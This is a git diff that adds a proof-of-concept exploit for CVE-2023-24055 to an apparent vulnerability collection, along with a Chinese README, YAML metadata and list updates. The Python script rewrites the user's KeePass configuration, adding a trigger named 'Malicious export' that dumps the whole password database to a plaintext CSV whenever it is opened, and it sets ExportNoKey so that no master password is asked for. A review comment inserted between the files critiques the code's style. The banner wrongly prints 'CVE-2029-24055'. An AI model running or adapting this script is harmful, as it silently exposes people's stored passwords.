diff --git a/cve/XML/CVE-2023-24055/CVE-2023-24055.py b/cve/XML/CVE-2023-24055/CVE-2023-24055.py
new file mode 100644
index 0000000000000000000000000000000000000000..d67da4023c5e1309682df6a2c5369211acca354f
--- /dev/null
+++ b/cve/XML/CVE-2023-24055/CVE-2023-24055.py
@@ -0,0 +1,74 @@
+import os
+from lxml import etree
+
+print('CVE-2029-24055 POC')
+print('======================')
+print('!!! Warning !!!')
+print('!!! This tool will try to add a Trigger so that the KeePass database is exported without protection!')
+print('!!! This tool does not check for anything and will just overwrite whatever it wants to!')
+print('!!! No backup, no mercy! Chances are high that this tool will leave your KeePass config in a corrupted state!')
+print('!!! No functionality is guaranteed! Use at your own risk!')
+print('See: https://sourceforge.net/p/keepass/discussion/329220/thread/a146e5cf6b/')
+print('======================')
+if os.name != 'nt':
+ print('Sorry, this tool works only under Windows!')
+ exit(1)
+
+# Get path to default config
+config_file=os.getenv('APPDATA')+"\KeePass\KeePass.config.xml"
+print(f"Reading from this config file: {config_file}")
+
+# Read Config
+tree = etree.parse(config_file)
+root = tree.getroot()
+
+# parse trough all Triggers to remove old versions
+for trigger in root.findall("./Application/TriggerSystem/Triggers/"):
+ if trigger.find('Guid').text == "yjxXO87yOkOtkWWCrf2CXQ==":
+ print("Removing old trigger!")
+ parent = trigger.getparent()
+ parent.remove(trigger)
+
+# Add malicious content
+triggers = root.find("./Application/TriggerSystem/")
+new_trigger = etree.SubElement(triggers, "Trigger")
+new_guid = etree.SubElement(new_trigger, "Guid")
+new_guid.text = "yjxXO87yOkOtkWWCrf2CXQ=="
+new_name = etree.SubElement(new_trigger, "Name")
+new_name.text = "Malicious export"
+new_events = etree.SubElement(new_trigger, "Events")
+new_event = etree.SubElement(new_events, "Event")
+new_typeguid = etree.SubElement(new_event, "TypeGuid")
+new_typeguid.text = "5f8TBoW4QYm5BvaeKztApw==" # on openening database... 
+new_parameters = etree.SubElement(new_event, "Parameters")
+new_parameter = etree.SubElement(new_parameters, "Parameter")
+new_parameter.text = "0"
+etree.SubElement(new_parameters, "Parameter")
+etree.SubElement(new_trigger, "Conditions")
+new_actions = etree.SubElement(new_trigger, "Actions")
+new_action = etree.SubElement(new_actions, "Action")
+new_typeguid = etree.SubElement(new_action, "TypeGuid")
+new_typeguid.text = "D5prW87VRr65NO2xP5RIIg==" # ... do malicious export
+new_parameters = etree.SubElement(new_action, "Parameters")
+new_parameter = etree.SubElement(new_parameters, "Parameter")
+new_parameter.text = "c:\\Users\\%USERNAME%\\KeepassExport.csv"
+new_parameter = etree.SubElement(new_parameters, "Parameter")
+new_parameter.text = "KeePass CSV (1.x)"
+etree.SubElement(new_parameters, "Parameter")
+etree.SubElement(new_parameters, "Parameter")
+
+# Disable Security policy
+exportnokey = root.find("./Security/Policy/ExportNoKey")
+try:
+ print("Removing old Policy!")
+ parent = exportnokey.getparent()
+ parent.remove(exportnokey)
+except:
+ pass
+
+policy = root.find("./Security/Policy")
+export_no_key = etree.SubElement(policy, "ExportNoKey")
+export_no_key.text = "true"
+
+#config_file=os.getenv('APPDATA')+"\KeePass\KeePass.config-BAK.xml"
+tree.write(config_file, encoding='utf-8', xml_declaration=True)
\ No newline at end of file
diff --git a/cve/XML/CVE-2023-24055/READ ME.md b/cve/XML/CVE-2023-24055/READ ME.md
new file mode 100644
index 0000000000000000000000000000000000000000..f0bfb5faa99ebf7b4f3df95799f0e609bffd456b
--- /dev/null
+++ b/cve/XML/CVE-2023-24055/READ ME.md
@@ -0,0 +1,5 @@
+CVE-2023-24055的概念验证代码
+
+该工具将打开目录%APPDATA%\Roaming\KeePass\KeePass.config.xml,并将添加一个触发器到KeePass的配置中,以便当前数据库在打开时被导出到c:\Users\%USERNAME%\KeepassExport.csv。
+
+参数ExportNoKey被设置为 "true",这样KeePass就不会在导出过程中要求提供主密码。
\ No newline at end of file
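Review bot: The bare `except: pass` around the ExportNoKey removal swallows every exception, including KeyboardInterrupt and SystemExit, when the only case the code means to tolerate is `exportnokey` being `None` from the preceding `root.find`; narrow it to `except AttributeError: pass`. The banner line prints `CVE-2029-24055 POC`, which does not match the CVE-2023-24055 file and directory names. The path literal `"\KeePass\KeePass.config.xml"` contains the invalid escape `\K`, which newer Python versions report as a SyntaxWarning; write it as the raw string `r"\KeePass\KeePass.config.xml"`. `exit(1)` in the non-Windows guard relies on the site-module helper, and `sys.exit(1)` with `import sys` is the portable form.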
diff --git a/cve/XML/yaml/CVE-2023-24055.yaml b/cve/XML/yaml/CVE-2023-24055.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..fa15b0d0933548e7226ed8eac4822e4cf9c70c33
--- /dev/null
+++ b/cve/XML/yaml/CVE-2023-24055.yaml
@@ -0,0 +1,20 @@
+id: CVE-2023-24055
+source:
+ https://github.com/deetl/CVE-2023-24055
+info:
+ name: XML
+ severity: medium
+ description: |
+ KeePass通过2.53(在默认安装中)允许拥有写入XML配置文件的权限攻击者,通过添加一个导出触发器来获得明文密码。
+ reference:
+ - https://securityboulevard.com/2023/01/keepass-password-manager-leak-cve-richixbw/
+ - https://sourceforge.net/p/keepass/discussion/329220/thread/a146e5cf6b/
+ - https://sourceforge.net/p/keepass/feature-requests/2773/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
+ cvss-score: 5.5
+ cve-id: CVE-2023-24055
+ cwe-id: CWE-312
+ cnvd-id: None
+ kve-id: None
+ tags: XML
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 211571f6447ebe793ef2ea64e87df544374ff211..85d3766de028a651fce8ab5d8974c9ae2e307b2c 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -182,3 +182,5 @@ kve:
 - KVE-2022-0206
 kylin-activation:
 - KVE-2022-0231
+ XML:
+ - CVE-2023-24055
\ No newline at end of file
diff --git a/other_list.yaml b/other_list.yaml
index ede901d9b464ce9df31a8ad0e18854fec49bfc0d..1a41f3fc67fcc2beb257e2754ad6d2c49dea9d3c 100644
--- a/other_list.yaml
+++ b/other_list.yaml
@@ -58,5 +58,7 @@ cve:
 - CVE-2022-30525
 WordPress:
 - CVE-2019-8942
+ Exit Strategy:
+ - CVE-2013-10025
 cnvd: